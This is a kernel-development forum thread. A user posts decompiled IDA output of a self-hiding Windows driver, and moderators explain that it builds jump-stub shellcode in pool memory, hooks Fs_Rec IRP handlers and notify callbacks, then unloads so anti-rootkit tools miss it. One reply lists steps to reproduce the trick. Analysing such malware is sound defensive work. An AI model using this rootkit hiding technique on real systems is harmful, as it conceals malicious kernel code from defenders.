need help Explain this code

Forum for discussion about kernel-mode development.
Post Reply
lwbkm
Posts: 11
Joined: Fri Apr 27, 2018 10:02 am

need help Explain this code

Post by lwbkm » Wed May 02, 2018 1:35 am

I found a driver sys , it can hide and delete himself and can not enum by ARK, but I don't understand this code. it got it from ida. who Can explain it to me.thanks very much.

Code: Select all

char __fastcall sub_140001EF0(__int64 a1)
{
  PVOID v1; // rax
  __int64 v2; // rcx
  PDRIVER_OBJECT v3; // rcx
  char v5; // [rsp+40h] [rbp-D8h]
  NTSTATUS (__stdcall *v6)(struct _DEVICE_OBJECT *, struct _IRP *); // [rsp+48h] [rbp-D0h]
  char v7; // [rsp+50h] [rbp-C8h]
  PVOID P; // [rsp+58h] [rbp-C0h]
  char v9; // [rsp+60h] [rbp-B8h]
  NTSTATUS v10; // [rsp+64h] [rbp-B4h]
  PVOID v11; // [rsp+68h] [rbp-B0h]
  PDRIVER_OBJECT DriverObject; // [rsp+70h] [rbp-A8h]
  PDEVICE_OBJECT DeviceObject; // [rsp+78h] [rbp-A0h]
  UNICODE_STRING DeviceName; // [rsp+80h] [rbp-98h]
  UNICODE_STRING DestinationString; // [rsp+90h] [rbp-88h]
  __int64 v16; // [rsp+A0h] [rbp-78h]
  UNICODE_STRING SymbolicLinkName; // [rsp+A8h] [rbp-70h]
  __int64 v18; // [rsp+B8h] [rbp-60h]
  char v19; // [rsp+C0h] [rbp-58h]
  char v20; // [rsp+D2h] [rbp-46h]
  __int64 v21; // [rsp+120h] [rbp+8h]

  v21 = a1;
  v11 = 0i64;
  v6 = 0i64;
  v7 = 0;
  qmemcpy(&v19, L"\\Device\\", 0x12ui64);
  memset(&v20, 0, 0x28ui64);
  v18 = 0i64;
  P = 0i64;
  v16 = 0i64;
  if ( (signed int)sub_1400028FC() >= 0 )
  {
    v1 = ExAllocatePool(0, 0x1000ui64);
    Dst = v1;
    if ( v1 )
    {
      memset(Dst, 0, 0x1000ui64);
      P = (PVOID)sub_1400014B8(&qword_140006010, 0i64, 1i64);
      if ( P )
      {
        qword_1400061C0 = sub_14000144C(&unk_140005140, 1024i64);
        if ( qword_1400061C0 )
        {
          qword_140006148 = sub_140001534(sub_140003F4C, 592i64, P);
          qword_140006150 = sub_140001534(sub_140003C8C, 848i64, P);
          qword_140006138 = sub_140001534(sub_14000432C, 256i64, P);
          qword_140006140 = sub_140001534(sub_1400041F0, 256i64, P);
          qword_140006188 = sub_140001534(sub_1400042E4, 80i64, P);
          qword_140006180 = sub_140001534(sub_140004298, 80i64, P);
          qword_140006190 = sub_140001534(sub_1400037E0, 640i64, P);
          qword_140006198 = sub_140001534(sub_140004158, 176i64, P);
          qword_1400061A0 = sub_140001534(sub_1400039CC, 848i64, P);
          v11 = (PVOID)sub_140001534(sub_140003754, 144i64, P);
          if ( v11 )
          {
            v6 = (NTSTATUS (__stdcall *)(struct _DEVICE_OBJECT *, struct _IRP *))sub_140001D6C("Fs_Rec.sys");
            if ( !v6 )
            {
              ExFreePoolWithTag(v11, 0);
              LOBYTE(v1) = 0;
              return (char)v1;
            }
            sub_140001CF0(v21, v6);
            RtlInitUnicodeString(&DestinationString, L"\\filesystem\\Fs_Rec");
            v10 = ObReferenceObjectByName(
                    &DestinationString,
                    576i64,
                    0i64,
                    0i64,
                    IoDriverObjectType,
                    0,
                    0i64,
                    &DriverObject);
            if ( v10 < 0 )
            {
              DbgPrint("failed :%x\n", (unsigned int)v10);
              LOBYTE(v1) = 0;
              return (char)v1;
            }
            v6 = (NTSTATUS (__stdcall *)(struct _DEVICE_OBJECT *, struct _IRP *))sub_140001BDC(v6);
            v5 = 72;
            sub_1400027E4(v6, &v5, 1i64);
            v5 = -72;
            sub_1400027E4((char *)v6 + 1, &v5, 1i64);
            sub_1400027E4((char *)v6 + 2, &v11, 8i64);
            v5 = -1;
            sub_1400027E4((char *)v6 + 10, &v5, 1i64);
            v5 = -32;
            sub_1400027E4((char *)v6 + 11, &v5, 1i64);
            LOBYTE(v2) = 1;
            sub_140002678(v2, v6);
            v6 = (NTSTATUS (__stdcall *)(struct _DEVICE_OBJECT *, struct _IRP *))((char *)v6 + 12);
            v11 = (PVOID)sub_140001534(sub_140002D2C, 512i64, P);
            v5 = 72;
            sub_1400027E4(v6, &v5, 1i64);
            v5 = -72;
            sub_1400027E4((char *)v6 + 1, &v5, 1i64);
            sub_1400027E4((char *)v6 + 2, &v11, 8i64);
            v5 = -1;
            sub_1400027E4((char *)v6 + 10, &v5, 1i64);
            v5 = -32;
            sub_1400027E4((char *)v6 + 11, &v5, 1i64);
            PsSetCreateProcessNotifyRoutineEx(v6, 0i64);
            v6 = (NTSTATUS (__stdcall *)(struct _DEVICE_OBJECT *, struct _IRP *))((char *)v6 + 12);
            v11 = (PVOID)sub_140001534(sub_140003674, 512i64, P);
            v5 = 72;
            sub_1400027E4(v6, &v5, 1i64);
            v5 = -72;
            sub_1400027E4((char *)v6 + 1, &v5, 1i64);
            sub_1400027E4((char *)v6 + 2, &v11, 8i64);
            v5 = -1;
            sub_1400027E4((char *)v6 + 10, &v5, 1i64);
            v5 = -32;
            sub_1400027E4((char *)v6 + 11, &v5, 1i64);
            PsSetLoadImageNotifyRoutine(v6);
            v6 = (NTSTATUS (__stdcall *)(struct _DEVICE_OBJECT *, struct _IRP *))((char *)v6 + 12);
            RtlInitUnicodeString(&DeviceName, L"\\Device\\iubesks");
            RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\iubesks");
            v10 = IoCreateDevice(DriverObject, 0, &DeviceName, 0x22u, 0, 0, &DeviceObject);
            v10 = IoCreateSymbolicLink(&SymbolicLinkName, &DeviceName);
            if ( v10 < 0 )
            {
              LOBYTE(v1) = 0;
              return (char)v1;
            }
            DeviceObject->Flags &= 0xFFFFFF7F;
            qword_1400061E8 = (__int64)DeviceObject;
            qword_140006120 = (__int64)DriverObject->MajorFunction[0];
            qword_140006128 = (__int64)DriverObject->MajorFunction[2];
            qword_140006130 = (__int64)DriverObject->MajorFunction[14];
            v11 = (PVOID)sub_140001534(sub_140002E14, 2142i64, P);
            v5 = 72;
            sub_1400027E4(v6, &v5, 1i64);
            v5 = -72;
            sub_1400027E4((char *)v6 + 1, &v5, 1i64);
            sub_1400027E4((char *)v6 + 2, &v11, 8i64);
            v5 = -1;
            sub_1400027E4((char *)v6 + 10, &v5, 1i64);
            v5 = -32;
            sub_1400027E4((char *)v6 + 11, &v5, 1i64);
            sub_1400014B8(&qword_140006010, P, 2i64);
            v9 = sub_14000276C();
            DriverObject->MajorFunction[0] = v6;
            DriverObject->MajorFunction[2] = v6;
            v3 = DriverObject;
            DriverObject->MajorFunction[14] = v6;
            LOBYTE(v3) = v9;
            sub_1400027B0(v3);
          }
          else
          {
            v7 = 0;
          }
          LOBYTE(v1) = v7;
          return (char)v1;
        }
        ExFreePoolWithTag(P, 0);
        LOBYTE(v1) = 0;
      }
      else
      {
        LOBYTE(v1) = 0;
      }
    }
  }
  else
  {
    LOBYTE(v1) = 1;
  }
  return (char)v1;
}

User avatar
EP_X0FF
Global Moderator
Posts: 4808
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: need help Explain this code

Post by EP_X0FF » Wed May 02, 2018 4:15 am

It is DriverEntry. That's all what you can get as an answer from posting raw IDA HexRays dump. If you want help seriously then you should attach actual file not useless HexRay dump.
Ring0 - the source of inspiration

lwbkm
Posts: 11
Joined: Fri Apr 27, 2018 10:02 am

Re: need help Explain this code

Post by lwbkm » Wed May 02, 2018 7:29 am

EP_X0FF wrote:
Wed May 02, 2018 4:15 am
It is DriverEntry. That's all what you can get as an answer from posting raw IDA HexRays dump. If you want help seriously then you should attach actual file not useless HexRay dump.
I only have this file sys;i want to understand how he realized it,maybe you can help me,thanks.
sys.rar
You do not have the required permissions to view the files attached to this post.

User avatar
Vrtule
Posts: 461
Joined: Sat Mar 13, 2010 9:14 pm
Location: Czech Republic
Contact:

Re: need help Explain this code

Post by Vrtule » Wed May 02, 2018 4:10 pm

As far as I understand the code, the driver just copies itself to some other memory locations, plays a little with FsRec.sys (since the kernel, including Patchguard, does not like registered callbacks not belonging to any driver) and returns STATUS_UNSUCCESSFUL, so the system unmaps its executable from meory. However, I am still not getting some minor things.

Since the driver is actually not loaded, its file can be deleted and it is not visible in the PsLoadedModuleList.

Assuming you are writting an ARK, this is NOT the way to go if you wish your driver being more stable and polite to other drivers.

lwbkm
Posts: 11
Joined: Fri Apr 27, 2018 10:02 am

Re: need help Explain this code

Post by lwbkm » Thu May 03, 2018 2:17 am

thanks,As I understood before, but some functions I do not understand, there is a similar source code to refer to?

User avatar
EP_X0FF
Global Moderator
Posts: 4808
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: need help Explain this code

Post by EP_X0FF » Thu May 03, 2018 8:28 am

This driver constructs shellcode in runtime in allocated from NonPaged pool memory, hooks IRP of some legitimate ms drivers and quits leaving shellcode work in callback routines. Later driver file can be removed by loader. That's why there is no "file" and "ark" won't detect it as "driver". However all it modifications are detectable. Strickly speaking this is piece of out-dated trash.

To reproduce this trash - load your driver, allocate memory from NonPaged pool, copy your shellcode to it and set notify routine where callback function will be your allocated memory. Unload your driver, remove file from disk. Done. Expect BSOD from PatchGuard on Windows 10 as "kernel notification callout modification".
Ring0 - the source of inspiration

lwbkm
Posts: 11
Joined: Fri Apr 27, 2018 10:02 am

Re: need help Explain this code

Post by lwbkm » Thu May 03, 2018 10:04 am

thanks,verymuch,I understand. :D :D :D :D

Post Reply